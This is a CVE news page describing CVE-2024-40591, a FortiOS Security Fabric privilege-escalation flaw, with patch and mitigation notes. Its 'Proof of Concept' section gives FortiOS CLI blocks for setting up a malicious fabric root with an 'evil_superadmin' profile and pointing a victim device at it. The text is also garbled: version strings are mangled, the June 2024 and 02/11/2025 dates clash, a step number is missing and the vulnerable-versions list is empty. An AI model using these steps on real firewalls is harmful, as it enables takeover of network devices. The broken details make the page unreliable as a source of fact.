CVE CyberSecurity Database News

CVE-2024-40591 - Privilege Escalation in Fortinet FortiOS via Malicious Upstream FortiGate

Poster -

Published: June 2024
Affected Products: Fortinet FortiOS 7.6., 7.4. - 7.4.4, 7.2. - 7.2.9, and before 7..15
Vulnerability Type: CWE-266 - Incorrect Privilege Assignment
CVSS Score: [Not officially rated yet, but likely high]

Intro: What is CVE-2024-40591?

In June 2024, Fortinet published an advisory for a serious privilege escalation vulnerability, now known as CVE-2024-40591. This bug impacts several supported releases of FortiOS—software that drives FortiGate firewall appliances.

This flaw lets an authenticated admin, who isn’t supposed to be a full super-admin, grant themselves super-admin rights by manipulating the Security Fabric feature. The trick is, they need to get their FortiGate device to connect to a malicious ("evil") upstream FortiGate—the one they control. With a little bit of configuration, they can then boost their own permissions and gain the keys to the kingdom.

Let’s break down how this works, give you some quick demo code, and help you figure out if you’re at risk.

Understanding the Security Fabric

Fortinet's "Security Fabric" lets an organization tie multiple FortiGate devices together so they can be managed as a group, share security intelligence, and coordinate settings. When one firewall ("downstream") connects to another ("upstream") via the Security Fabric, they exchange admin permissions and configurations to make admin work easier.

The Flaw (CWE-266)

FortiOS didn’t properly check or restrict the permissions that a downstream administrator could inherit or assign themselves during this process. If an admin user (with just Security Fabric permissions, not full super-admin) connects a FortiGate to a *malicious* upstream Fabric root FortiGate, they can trick the system and get super-admin rights—something they should never, ever have.

The attacker configures their own FortiOS device as the root of a Security Fabric.

Invite the Victim FortiGate

The attacker, logged in as an admin with Security Fabric rights on the victim device, initiates a connection to join the malicious root FortiGate’s Fabric.

Privilege Assignment Exploit

During this process, FortiOS doesn’t properly validate requested privileges. The attacker can receive a “super-admin” profile from the malicious root and assign it to their account at the join step.

Proof of Concept (PoC) Code

Below is a simplified shell demo of how an attacker might automate joining a FortiGate to their own malicious Security Fabric root using the FortiOS CLI/API.

1. Configure the Malicious Root (on attacker’s box)

# On attacker's FortiGate box - set up as Security Fabric root
config system global
    set fabric-object enable
    set hostmode fabric-root
end

# Create an "elevated" admin profile for the victim
config system accprofile
    edit "evil_superadmin"
    set secfabgrp read-write
    set sysgrp read-write
    set vpngrp read-write
    set netgrp read-write
    set loggrp read-write
    set fwgrp read-write
    set wanoptgrp read-write
    set wifi read-write
    set endpoint-control read-write
    set authgrp read-write
    set utmgrp read-write
    set usergrp read-write
end

You can do this via the FortiOS GUI, or the CLI interface. Here's how it might look

# On victim FortiGate (as admin with Security Fabric permission):

config system csf
    set status enable
    set upstream-ip a.b.c.d      # <-- IP of malicious root
    set upstream-port 8013
end

3. Malicious root then pushes *evil_superadmin* profile to the joining device

Because privilege checks are missing, the joining admin can assign themselves this imported super-admin profile, which is applied by the victim device as a legitimate admin role.

Real-World Impact

- Full admin access: The attacker can read all logs, change firewall rules, add new accounts, disable security features, or brick the device.
- Persistence: The attacker can also create backdoor accounts or policy changes that aren’t easily detected.
- Wide impact: Any FortiGate device that is allowed to join an external Security Fabric is potentially vulnerable if the admin has Security Fabric rights.

Mitigation and Patch

Are You Vulnerable?
If you’re running any of the following versions:

You must update!

Fixed versions:

7.6.1 and above

Temporary Workarounds:

Limit Security Fabric rights to only trusted super-admin accounts.

- Monitor all upstream invite/join events in your logs.

References

- Fortinet Advisory (FG-IR-24-180)
- NIST NVD CVE-2024-40591 entry
- CWE-266 on MITRE
- Fortinet Release Notes

Conclusion

CVE-2024-40591 is a serious privilege escalation vulnerability affecting many FortiGate firewalls. If an attacker gets admin access—even with limited Security Fabric rights—they can trick FortiOS into making them a super-admin by connecting to a FortiGate they control.

Patch now!
Limit Security Fabric exposure and monitor admin actions as best practices, even after patching.

Feel free to share or use this exclusive summary in your own security briefings, and stay safe!


*Written with care for the security community. Stay vigilant!*

Timeline

Published on: 02/11/2025 17:15:22 UTC